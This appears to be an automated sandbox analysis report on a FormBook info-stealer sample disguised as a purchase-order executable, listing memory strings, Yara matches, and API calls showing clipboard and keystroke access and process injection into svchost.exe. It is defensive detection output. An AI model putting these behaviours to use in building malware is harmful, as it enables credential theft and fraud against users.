Source: HOSTNAME.EXE, 0000000C.00000002.3496700059.0000000006A30000.00000004.00000800.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000002.3494932926.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 0000000D.00000002.3494169778.0000000003A26000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121124551331.jpg
Source: HOSTNAME.EXE, 0000000C.00000002.3496700059.0000000006A30000.00000004.00000800.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000002.3494932926.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 0000000D.00000002.3494169778.0000000003A26000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121340566585.jpg
Source: HOSTNAME.EXE, 0000000C.00000002.3496700059.0000000006A30000.00000004.00000800.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000002.3494932926.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 0000000D.00000002.3494169778.0000000003A26000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121349175783.jpg
Source: HOSTNAME.EXE, 0000000C.00000002.3496700059.0000000006A30000.00000004.00000800.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000002.3494932926.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 0000000D.00000002.3494169778.0000000003A26000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121401562198.jpg
Source: HOSTNAME.EXE, 0000000C.00000002.3496700059.0000000006A30000.00000004.00000800.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000002.3494932926.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 0000000D.00000002.3494169778.0000000003A26000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121424131858.jpg
Source: HOSTNAME.EXE, 0000000C.00000003.1534643159.000000000847D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: HOSTNAME.EXE, 0000000C.00000003.1534643159.000000000847D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00264164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00264164

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00264164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00264164

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00263F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00263F66

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_0025001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_0025001C

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_0027CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0027CABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.3494046989.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1348873063.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1353670483.0000000005900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3492124439.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3494131195.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3494078242.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1352817809.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: This is a third-party compiled AutoIt script.	0_2_001F3B3A
Source: PURCHASE ORDER N0259305-06SN.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000002.1043576164.00000000002A4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e65e6007-f
Source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000002.1043576164.00000000002A4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_5871b9ef-a

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: PURCHASE ORDER N0259305-06SN.exe

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_001F3633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	0_2_001F3633
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0027C1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	0_2_0027C1AC
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0027C498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	0_2_0027C498
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0027C57D SendMessageW,NtdllDialogWndProc_W,	0_2_0027C57D
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0027C5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	0_2_0027C5FE
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0027C860 NtdllDialogWndProc_W,	0_2_0027C860
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0027C8BE NtdllDialogWndProc_W,	0_2_0027C8BE
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0027C88F NtdllDialogWndProc_W,	0_2_0027C88F
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0027C93E ClientToScreen,NtdllDialogWndProc_W,	0_2_0027C93E
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0027C909 NtdllDialogWndProc_W,	0_2_0027C909
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0027CA7C GetWindowLongW,NtdllDialogWndProc_W,	0_2_0027CA7C
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0027CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	0_2_0027CABC
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_001F1290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,	0_2_001F1290
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_001F1287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,746CC8D0,NtdllDialogWndProc_W,	0_2_001F1287
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0027D3B8 NtdllDialogWndProc_W,	0_2_0027D3B8
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0027D43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,	0_2_0027D43E
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_001F167D NtdllDialogWndProc_W,	0_2_001F167D
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_001F16B5 NtdllDialogWndProc_W,	0_2_001F16B5
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_001F16DE GetParent,NtdllDialogWndProc_W,	0_2_001F16DE
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0027D78C NtdllDialogWndProc_W,	0_2_0027D78C
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_001F189B NtdllDialogWndProc_W,	0_2_001F189B
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0027BC5D NtdllDialogWndProc_W,CallWindowProcW,	0_2_0027BC5D
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0027BF30 NtdllDialogWndProc_W,	0_2_0027BF30
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0027BF8C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	0_2_0027BF8C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042CBD3 NtClose,	2_2_0042CBD3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472B60 NtClose,LdrInitializeThunk,	2_2_03472B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03472DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03472C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk,	2_2_034735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03474340 NtSetContextThread,	2_2_03474340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03474650 NtSuspendThread,	2_2_03474650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472BE0 NtQueryValueKey,	2_2_03472BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472BF0 NtAllocateVirtualMemory,	2_2_03472BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472B80 NtQueryInformationFile,	2_2_03472B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472BA0 NtEnumerateValueKey,	2_2_03472BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472AD0 NtReadFile,	2_2_03472AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472AF0 NtWriteFile,	2_2_03472AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472AB0 NtWaitForSingleObject,	2_2_03472AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472F60 NtCreateProcessEx,	2_2_03472F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472F30 NtCreateSection,	2_2_03472F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472FE0 NtCreateFile,	2_2_03472FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472F90 NtProtectVirtualMemory,	2_2_03472F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472FA0 NtQuerySection,	2_2_03472FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472FB0 NtResumeThread,	2_2_03472FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472E30 NtWriteVirtualMemory,	2_2_03472E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472EE0 NtQueueApcThread,	2_2_03472EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472E80 NtReadVirtualMemory,	2_2_03472E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472EA0 NtAdjustPrivilegesToken,	2_2_03472EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D00 NtSetInformationFile,	2_2_03472D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D10 NtMapViewOfSection,	2_2_03472D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D30 NtUnmapViewOfSection,	2_2_03472D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472DD0 NtDelayExecution,	2_2_03472DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472DB0 NtEnumerateKey,	2_2_03472DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472C60 NtCreateKey,	2_2_03472C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472C00 NtQueryInformationProcess,	2_2_03472C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472CC0 NtQueryVirtualMemory,	2_2_03472CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472CF0 NtOpenProcess,	2_2_03472CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472CA0 NtQueryInformationToken,	2_2_03472CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473010 NtOpenDirectoryObject,	2_2_03473010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473090 NtSetValueKey,	2_2_03473090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034739B0 NtGetContextThread,	2_2_034739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473D70 NtOpenThread,	2_2_03473D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473D10 NtOpenProcessToken,	2_2_03473D10
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B14340 NtSetContextThread,LdrInitializeThunk,	12_2_03B14340
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B14650 NtSuspendThread,LdrInitializeThunk,	12_2_03B14650
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12BA0 NtEnumerateValueKey,LdrInitializeThunk,	12_2_03B12BA0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	12_2_03B12BF0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12BE0 NtQueryValueKey,LdrInitializeThunk,	12_2_03B12BE0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12B60 NtClose,LdrInitializeThunk,	12_2_03B12B60
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12AF0 NtWriteFile,LdrInitializeThunk,	12_2_03B12AF0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12AD0 NtReadFile,LdrInitializeThunk,	12_2_03B12AD0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12FB0 NtResumeThread,LdrInitializeThunk,	12_2_03B12FB0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12FE0 NtCreateFile,LdrInitializeThunk,	12_2_03B12FE0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12F30 NtCreateSection,LdrInitializeThunk,	12_2_03B12F30
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12E80 NtReadVirtualMemory,LdrInitializeThunk,	12_2_03B12E80
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12EE0 NtQueueApcThread,LdrInitializeThunk,	12_2_03B12EE0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12DF0 NtQuerySystemInformation,LdrInitializeThunk,	12_2_03B12DF0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12DD0 NtDelayExecution,LdrInitializeThunk,	12_2_03B12DD0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12D30 NtUnmapViewOfSection,LdrInitializeThunk,	12_2_03B12D30
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12D10 NtMapViewOfSection,LdrInitializeThunk,	12_2_03B12D10
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12CA0 NtQueryInformationToken,LdrInitializeThunk,	12_2_03B12CA0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12C70 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_03B12C70
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12C60 NtCreateKey,LdrInitializeThunk,	12_2_03B12C60
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B135C0 NtCreateMutant,LdrInitializeThunk,	12_2_03B135C0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B139B0 NtGetContextThread,LdrInitializeThunk,	12_2_03B139B0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12B80 NtQueryInformationFile,	12_2_03B12B80
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12AB0 NtWaitForSingleObject,	12_2_03B12AB0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12FA0 NtQuerySection,	12_2_03B12FA0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12F90 NtProtectVirtualMemory,	12_2_03B12F90
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12F60 NtCreateProcessEx,	12_2_03B12F60
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12EA0 NtAdjustPrivilegesToken,	12_2_03B12EA0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12E30 NtWriteVirtualMemory,	12_2_03B12E30
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12DB0 NtEnumerateKey,	12_2_03B12DB0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12D00 NtSetInformationFile,	12_2_03B12D00
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12CF0 NtOpenProcess,	12_2_03B12CF0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12CC0 NtQueryVirtualMemory,	12_2_03B12CC0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B12C00 NtQueryInformationProcess,	12_2_03B12C00
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B13090 NtSetValueKey,	12_2_03B13090
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B13010 NtOpenDirectoryObject,	12_2_03B13010
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B13D10 NtOpenProcessToken,	12_2_03B13D10
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03B13D70 NtOpenThread,	12_2_03B13D70
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032D97D0 NtReadFile,	12_2_032D97D0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032D9660 NtCreateFile,	12_2_032D9660
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032D9AD0 NtAllocateVirtualMemory,	12_2_032D9AD0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032D9960 NtClose,	12_2_032D9960
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032D98C0 NtDeleteFile,	12_2_032D98C0

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_0025A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0025A1EF

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00248310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,73D55590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,

0_2_00248310

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_002551BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_002551BD

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_001FE6A0	0_2_001FE6A0
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0021D975	0_2_0021D975
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_002121C5	0_2_002121C5
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_002262D2	0_2_002262D2
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_002703DA	0_2_002703DA
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0022242E	0_2_0022242E
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_002125FA	0_2_002125FA
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0024E616	0_2_0024E616
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_002066E1	0_2_002066E1
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0022878F	0_2_0022878F
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00208808	0_2_00208808
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00226844	0_2_00226844
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00270857	0_2_00270857
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00258889	0_2_00258889
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0021CB21	0_2_0021CB21
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00226DB6	0_2_00226DB6
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00206F9E	0_2_00206F9E
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00203030	0_2_00203030
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00213187	0_2_00213187
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0021F1D9	0_2_0021F1D9
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_001F1287	0_2_001F1287
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00211484	0_2_00211484
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00205520	0_2_00205520
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00217696	0_2_00217696
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00205760	0_2_00205760
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00211978	0_2_00211978
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00229AB5	0_2_00229AB5
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_001FFCE0	0_2_001FFCE0
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0021BDA6	0_2_0021BDA6
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00211D90	0_2_00211D90
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00277DDB	0_2_00277DDB
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_001FDF00	0_2_001FDF00
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00203FE0	0_2_00203FE0
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D6F8E0	0_2_00D6F8E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418B23	2_2_00418B23
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401190	2_2_00401190
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042F223	2_2_0042F223
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004102DF	2_2_004102DF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004102E3	2_2_004102E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402A8B	2_2_00402A8B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402A90	2_2_00402A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004023F0	2_2_004023F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E4F3	2_2_0040E4F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410503	2_2_00410503
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416D1F	2_2_00416D1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416D23	2_2_00416D23
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E643	2_2_0040E643
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E637	2_2_0040E637
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402FF0	2_2_00402FF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA352	2_2_034FA352
